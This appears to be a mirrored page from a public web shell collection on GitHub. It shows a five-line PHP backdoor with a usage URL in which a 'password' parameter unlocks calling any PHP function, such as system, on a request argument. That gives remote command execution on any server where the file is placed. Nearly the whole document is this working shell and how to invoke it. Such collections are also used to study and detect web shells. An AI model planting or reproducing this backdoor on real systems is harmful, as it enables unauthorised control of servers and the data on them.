mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 04:41:28 +00:00
from: https://mp.weixin.qq.com/s/f6cFhc0Ukk0wQFGP1lQ4BQ usage: http://example.com/shell3.php?f=system&a=pwd&p=password
5 lines
69 B
PHP
5 lines
69 B
PHP
<?php
|
|
if ($_GET['p']=='password'){
|
|
$_GET['f']($_GET['a']);
|
|
}
|